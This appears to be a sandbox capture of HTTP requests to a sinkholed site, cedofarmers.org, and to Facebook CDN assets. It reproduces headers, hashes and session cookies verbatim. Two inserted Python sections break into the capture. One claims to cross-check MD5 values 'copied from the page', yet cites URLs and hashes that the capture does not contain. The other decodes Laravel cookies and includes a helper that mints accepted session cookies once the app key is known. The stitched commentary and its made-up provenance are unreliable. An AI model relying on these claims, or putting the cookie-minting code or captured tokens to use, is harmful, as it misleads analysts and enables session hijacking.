GET /rsrc.php/v3iEpO4/yC/l/en_US/I52F_owkvX4.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 02 Nov 2023 19:19:47 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: 5awnQ3VFe4KJEocYEbS+lA==
x-fb-debug: A69DPQXhkxcqr8dhq9gxsPnfUKmSBxAmHB1DiK5n9OBFY9YKN4sHzuSG6TTw/KAmtV3VGX6Zl/E3RELd2smEhA==
priority: u=3,i
content-length: 23273
x-fb-trip-id: 1904183273
date: Tue, 08 Nov 2022 22:20:38 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
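Added check, not part of the capture: the three static.xx.fbcdn.net responses above each carry a content-md5 header, and the sandbox separately reports an MD5 for the body it stored. Content-MD5 is the base64 of the 16 raw digest bytes, so the two can be compared directly once the header is decoded to hex. The script below does that for the three entries (values copied from the page; the function names and the tampered-entry test input are this example's own).

```python
import base64
import binascii

# Copied from the three static.xx.fbcdn.net entries above: URL, the MD5 the
# sandbox reports for the stored body, and the content-md5 response header
# (RFC 1864: base64 of the 16 raw digest bytes) that came with it.
CAPTURED = [
    ("static.xx.fbcdn.net/rsrc.php/v3/yV/r/oDVETVg4GJv.js",
     "d1ba68f146b01f4aef60d79aadb926ea", "0bpo8UawH0rvYNearbkm6g=="),
    ("static.xx.fbcdn.net/rsrc.php/v3/yF/l/0,cross/ScKYGqqHLxM.css",
     "68b687b4bd9b8bc82a675dcc86c76b59", "aLaHtL2bi8gqZ13MhsdrWQ=="),
    ("static.xx.fbcdn.net/rsrc.php/v3iEpO4/yC/l/en_US/I52F_owkvX4.js",
     "e5ac274375457b828912871811b4be94", "5awnQ3VFe4KJEocYEbS+lA=="),
]


def content_md5_to_hex(header_value):
    """Decode a Content-MD5 header value to the 32-hex-digit form hashing tools print."""
    raw = base64.b64decode(header_value, validate=True)
    if len(raw) != 16:
        raise ValueError(f"Content-MD5 must decode to 16 bytes, got {len(raw)}")
    return binascii.hexlify(raw).decode("ascii")


def hex_to_content_md5(md5_hex):
    """Inverse direction: the header value an origin would emit for a given MD5 hex digest."""
    return base64.b64encode(binascii.unhexlify(md5_hex)).decode("ascii")


def cross_check(entries=CAPTURED):
    """One result per entry: does the header digest agree with the stored-body digest?"""
    results = []
    for url, md5_hex, header in entries:
        header_hex = content_md5_to_hex(header)
        results.append({
            "url": url,
            "reported_md5": md5_hex.lower(),
            "header_md5": header_hex,
            "match": header_hex == md5_hex.lower(),
        })
    return results


def mismatches(entries=CAPTURED):
    """URLs whose stored body does not hash to what the origin claimed it sent."""
    return [r["url"] for r in cross_check(entries) if not r["match"]]


if __name__ == "__main__":
    for r in cross_check():
        print("OK  " if r["match"] else "BAD ", r["url"], r["header_md5"])
```

All three agree, which confirms the sandbox hashed exactly the bytes the header describes. The caveat: Content-MD5 is chosen by the origin, so a match only rules out corruption or rewriting between origin and capture; it says nothing about whether the origin served what it should have, and an attacker who can rewrite the body can recompute the header just as easily.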
use.fontawesome.com/releases/v5.7.2/css/all.css
172.64.132.15 200 OK 13 kB URL HTTP/2 use.fontawesome.com/releases/v5.7.2/css/all.css
IP 172.64.132.15:0
File type ASCII text, with very long lines (54456), with no line terminators
Hash 6c8334c229d6a393c38e6ea8255c6c98
da953b4f3934df475213713e1f0dc3c917221196
11335baaef33c3a7446ff14ad2988649a5bac0e683c72a8065e7a906b2313fb0
GET /releases/v5.7.2/css/all.css HTTP/1.1
Host: use.fontawesome.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://cedofarmers.org
Connection: keep-alive
Referer: https://cedofarmers.org/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
date: Tue, 08 Nov 2022 22:20:36 GMT
content-type: text/css
x-amz-id-2: +rhLG+MOji4KHBZGRWrcg+5HfaomEQuxrRIyp7ctCPNSbM8zFBD8gAYD19HxrhkIPoWcq7L3C4o=
x-amz-request-id: 5Z7GP9CE0MGX9XSJ
access-control-allow-origin: *
access-control-allow-methods: GET
access-control-max-age: 3000
vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
last-modified: Wed, 30 Jun 2021 15:45:57 GMT
etag: W/"7b1d7f457d056ace7b230b587b9f3753"
cache-control: max-age=31556926
cf-cache-status: MISS
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QLp0W9H4HEoyBf2gCzsjy9T%2BYhAQDF8%2BpI%2FFKnlD3Ci40DL0zEfSPCzbW1h0%2FNdSjDi%2BNBlvAfousj7HVy%2FArQatSeqRr5uelpYgk%2Fff%2BYGaC2jmBAl%2FRH3Q3p8QLGC5VJAzWhsh"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 7671b26a09c475c6-LHR
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2
cedofarmers.org/css/style.css
192.185.57.117 200 OK 54 kB URL HTTP/2 cedofarmers.org/css/style.css
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Hash 63e5a027a430bc24a0d17d6040d63431
a58bd20f076b20fb05f6b42bd18275b9bf2ea47d
55d724ee05f250765c8970ab4292103656dd79903632cb444926c7b133eddfc6
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /css/style.css HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 19 Jun 2021 15:50:27 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-type: text/css
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
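Added check, not part of the capture: the Cookie header on this and the following cedofarmers.org requests carries two values (XSRF-TOKEN and laravel_session) that both start with eyJpdiI6, which is base64 for {"iv":. That is the envelope Laravel's Encrypter produces: base64 of a JSON object with iv, value and mac fields, the mac being HMAC-SHA256 over the base64 IV concatenated with the base64 ciphertext, keyed with the application's APP_KEY. The script below parses the captured header (copied verbatim), decodes the envelope without any key to show its shape, and implements the MAC check an analyst would run if the key were recovered. The cipher step is left out on purpose; the constructed key and placeholder ciphertext in the round-trip are this example's own, and the real key is not known from the page.

```python
import base64
import hashlib
import hmac
import json
from urllib.parse import unquote

# The Cookie request header captured on the cedofarmers.org requests above, copied verbatim.
COOKIE_HEADER = "XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D"


def parse_cookie_header(header):
    """Split a Cookie request header into {name: value}; values are URL-decoded (%3D -> '=')."""
    cookies = {}
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = unquote(value)
    return cookies


def decode_laravel_envelope(cookie_value):
    """Decode Laravel's base64(JSON{"iv","value","mac"[,"tag"]}) envelope, no key needed.

    Reports whether it has the AES-CBC shape the framework uses: 16-byte IV,
    ciphertext in whole 16-byte blocks, 64-hex-digit MAC. Only the plaintext
    is secret; the layout, and therefore the framework, is visible to anyone.
    """
    env = json.loads(base64.b64decode(cookie_value))
    iv = base64.b64decode(env["iv"])
    ct = base64.b64decode(env["value"])
    mac = env["mac"]
    return {
        "keys": sorted(env),
        "iv_len": len(iv),
        "ct_len": len(ct),
        "mac_hex": mac,
        "cbc_shaped": len(iv) == 16 and len(ct) > 0 and len(ct) % 16 == 0,
        "mac_well_formed": len(mac) == 64 and all(c in "0123456789abcdef" for c in mac),
    }


def laravel_mac_ok(cookie_value, app_key):
    """Recompute Laravel's MAC: HMAC-SHA256(base64(iv) || base64(ciphertext), APP_KEY).

    app_key is the raw 32-byte key; the .env value is written 'base64:...' and
    must be base64-decoded first.
    """
    env = json.loads(base64.b64decode(cookie_value))
    expected = hmac.new(app_key, (env["iv"] + env["value"]).encode("ascii"), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, env["mac"])


def build_envelope(app_key, iv, ciphertext):
    """Assemble an envelope the way Laravel does, MAC computed over the base64 strings.

    Encryption is omitted here: the ciphertext is passed in so the MAC path can be
    exercised stand-alone, and that path is what decides whether a cookie is accepted.
    """
    iv_b64 = base64.b64encode(iv).decode("ascii")
    ct_b64 = base64.b64encode(ciphertext).decode("ascii")
    mac = hmac.new(app_key, (iv_b64 + ct_b64).encode("ascii"), hashlib.sha256).hexdigest()
    body = json.dumps({"iv": iv_b64, "value": ct_b64, "mac": mac}, separators=(",", ":"))
    return base64.b64encode(body.encode("ascii")).decode("ascii")


def inspect_capture(header=COOKIE_HEADER):
    """Envelope summary for every cookie in the captured header."""
    return {name: decode_laravel_envelope(value) for name, value in parse_cookie_header(header).items()}
```

Both captured cookies decode to a 16-byte IV, 96 bytes of ciphertext (six CBC blocks) and a 64-hex MAC, which is the shape Laravel emits for a 41-byte cookie-name prefix plus a 40-character token. The practical point for an analyst is that everything about these cookies rests on APP_KEY: whoever holds it can run build_envelope and mint a session or XSRF cookie the server will accept, so a capture like this tells you which secret to look for in any later host-level investigation, not that the site is vulnerable on its own.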
static.xx.fbcdn.net/rsrc.php/v3/yM/r/WNuD0ewp6xQ.js?_nc_x=Ij3Wp8lg5Kz
31.13.72.12 200 OK 91 kB URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3/yM/r/WNuD0ewp6xQ.js?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type ASCII text, with very long lines (18630)
Hash 2735f6f13ab0e68d5d21650e8d76d90d
fac3c804bd2c335c0c6aa615a0f6bd9197d5ed87
1744afaa9fc41238e9cfa2073844a8c1ed9c80093e5f1555fc93acfbec268b5d
GET /rsrc.php/v3/yM/r/WNuD0ewp6xQ.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Wed, 08 Nov 2023 01:32:04 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: JzX28Tqw5o1dIWUOjXbZDQ==
x-fb-debug: bC5+aa5Je0InC3pf1rVrCdTR4TP6lFHLdvrsN0ce1Cc3jv3cHGvzYTQToVx8+qOeVfHGmJ0JfNlleTuHo1Q+uQ==
content-length: 91137
x-fb-trip-id: 1904183273
date: Tue, 08 Nov 2022 22:20:38 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3/ys/r/ojzICpVg5Kb.js?_nc_x=Ij3Wp8lg5Kz
31.13.72.12 200 OK 16 kB URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3/ys/r/ojzICpVg5Kb.js?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type C source, ASCII text, with very long lines (8749)
Hash c2b0fc32b893b1c243b3a27bcc5799cd
a9a85686e79bf7bba56cf1a7883b89447096eb54
f84f8dc2511cfbed3abe4ae7dd9c8e02c02260e0824eddaf69f2d54f3994a726
GET /rsrc.php/v3/ys/r/ojzICpVg5Kb.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sun, 05 Nov 2023 03:23:46 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: wrD8MriTscJDs6J7zFeZzQ==
x-fb-debug: ZeaG4nczRFV9qJrZM59ZmYklxtldDRvk75b6fH34gkz1gMCEFsaTtetQwAT3aF82JRPYbxFDD5vVyCK2+3MHGg==
priority: u=3,i
content-length: 16259
x-fb-trip-id: 1904183273
date: Tue, 08 Nov 2022 22:20:38 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3/y6/r/8LoDHCcRMmF.js?_nc_x=Ij3Wp8lg5Kz
31.13.72.12 200 OK 12 kB URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3/y6/r/8LoDHCcRMmF.js?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type ASCII text, with very long lines (5542)
Hash 0765d76d746716156d53d36ee6f80836
17e1546f87cc6417615caa10dcbbcb699c59471a
f1e6af63ae9ff0385126b72a492b0d34709514dd4c00074a1be28272c253d4f8
GET /rsrc.php/v3/y6/r/8LoDHCcRMmF.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Wed, 08 Nov 2023 14:58:40 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: B2XXbXRnFhVtU9Nu5vgINg==
x-fb-debug: D5GS3x6wx04rycniYZY/0Xz+ksXYSSm92jqaYBfwJdNE2gVWZsHNSKS1Na1e4Jf9SQ8Wn6qjKZVunFivJgncuw==
priority: u=3,i
content-length: 12369
x-fb-trip-id: 1904183273
date: Tue, 08 Nov 2022 22:20:38 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
scontent-arn2-2.xx.fbcdn.net/v/t39.30808-1/308009677_406387218318479_7887056903145320551_n.jpg?stp=c1.0.50.50a_cp0_dst-jpg_p50x50&_nc_cat=108&ccb=1-7&_nc_sid=dbb9e7&_nc_ohc=AF4olkElq2UAX-cgmYK&_nc_ht=scontent-arn2-2.xx&oh=00_AfAba7cdRPHinAdz5eXe6Aaam63J3uuPZV6KGeRPycboFg&oe=6370217E
157.240.194.27 200 OK 2.2 kB URL HTTP/2 scontent-arn2-2.xx.fbcdn.net/v/t39.30808-1/308009677_406387218318479_7887056903145320551_n.jpg?stp=c1.0.50.50a_cp0_dst-jpg_p50x50&_nc_cat=108&ccb=1-7&_nc_sid=dbb9e7&_nc_ohc=AF4olkElq2UAX-cgmYK&_nc_ht=scontent-arn2-2.xx&oh=00_AfAba7cdRPHinAdz5eXe6Aaam63J3uuPZV6KGeRPycboFg&oe=6370217E
IP 157.240.194.27:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 50x50, components 3
Hash 2dc2b52940d4885637e6e4097f6cfb94
f9f70a65aab76ad9ff18216f6c05563f63775a88
5c5b484596b6266c93c3540e573c174561a16c6cc61985ed3750ffeb2c82d185
GET /v/t39.30808-1/308009677_406387218318479_7887056903145320551_n.jpg?stp=c1.0.50.50a_cp0_dst-jpg_p50x50&_nc_cat=108&ccb=1-7&_nc_sid=dbb9e7&_nc_ohc=AF4olkElq2UAX-cgmYK&_nc_ht=scontent-arn2-2.xx&oh=00_AfAba7cdRPHinAdz5eXe6Aaam63J3uuPZV6KGeRPycboFg&oe=6370217E HTTP/1.1
Host: scontent-arn2-2.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
x-storage-error-category: dfs:none;hs_p:200:HS_ESUCCESS
last-modified: Wed, 28 Sep 2022 02:14:43 GMT
x-haystack-needlechecksum: 2226211856
x-needle-checksum: 185997496
content-type: image/jpeg
content-digest: adler32=2948273709
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
cache-control: max-age=1209600, no-transform
content-length: 2152
x-fb-trip-id: 1904183273
date: Tue, 08 Nov 2022 22:20:39 GMT
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226138-LWR_logo.png
192.185.57.117 200 OK 6.5 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226138-LWR_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 202 x 105, 8-bit/color RGBA, non-interlaced
Hash 8e5beb848c845557339a3655c5739797
9f3e281eb8228e6b9e7e394ecf9c41d59de7f5fa
e22a121b4142e6b94b58f79e8e470c1b0a68f96e0df9ead4800c5f9c44cb4e9b
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226138-LWR_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:22:18 GMT
accept-ranges: bytes
content-length: 6465
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226130-KARLO_logo.jpg
192.185.57.117 200 OK 8.0 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226130-KARLO_logo.jpg
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v90), quality = 90", baseline, precision 8, 150x107, components 3
Hash a70178ed43b38e68755a5d8151784977
82efa0ffc4c68bd719647ae2280f558fcaf8d3fc
49c0797da907ea1e62d3f25df9546275a097ebf1618f63b22b9b9e9e5571ce7c
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226130-KARLO_logo.jpg HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:22:10 GMT
accept-ranges: bytes
content-length: 7970
content-type: image/jpeg
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226064-farmradio_logo.png
192.185.57.117 200 OK 8.5 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226064-farmradio_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 260 x 83, 8-bit/color RGBA, non-interlaced
Hash acbc305b30b93c9cad8a0319bc83beb2
82ac01754fd55c3b2a8536c731705c3bb5370d01
0067638d649205450369e299ebe376323fe320748a60783a0696a59102ed5fc2
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226064-farmradio_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:21:04 GMT
accept-ranges: bytes
content-length: 8523
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226219-RHSP_logo.jpg
192.185.57.117 200 OK 9.6 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226219-RHSP_logo.jpg
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
